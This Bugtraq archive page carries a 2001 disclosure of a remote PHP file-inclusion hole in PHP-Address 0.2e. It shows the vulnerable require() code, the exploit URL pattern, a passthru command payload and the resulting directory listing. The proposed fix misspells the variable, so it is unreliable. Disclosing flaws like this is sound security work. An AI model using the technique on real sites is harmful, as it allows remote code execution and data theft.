Home page logo

bugtraq logo Bugtraq mailing list archives

PHP source injection in PHPAddress
From: "tim vandermeersch" <tim.vandermeersch () pandora be>
Date: Wed, 26 Dec 2001 05:19:11 +0100

PHP source injection in PHPAddress


PHP-Address is a collection of PHP3-Scripts (works on PHP4 too)
for maintaing a small web-based address-database. It can be found
at http://phpaddress.huebsch-gemacht.de/


Change the global.php3 file so it looks like this:
# (c) Copyright in 2000, 2001 by Chris Huebsch
(chu () informatik tu-chemnitz de)
$LanCookie = "";      // THIS LINE
if ($LangCookie)
  require("$LangCookie.php3");  // Line 5

Tested version

PHP Address 0.2e (09.12.2001)

The Problem

Any user who requests an url like
"http://SERVER/globals.php3?LangCookie=INCLUDE_FILE"; is
able to include any file he wants.


I putted a PHP script on my server wich I wanted to include:

    passthru("/bin/ls /");

then i requested this url:
(the .php3 is allready there look at line 5 in global.php3)

bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
usr var

Note that any PHP code could be included, malicious users could get access
to database
passwords, personal information, ...

Tim Vandermeersch
Tim.Vandermeersch () pandora be

  By Date           By Thread  

Current thread:
  • PHP source injection in PHPAddress tim vandermeersch (Jun 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]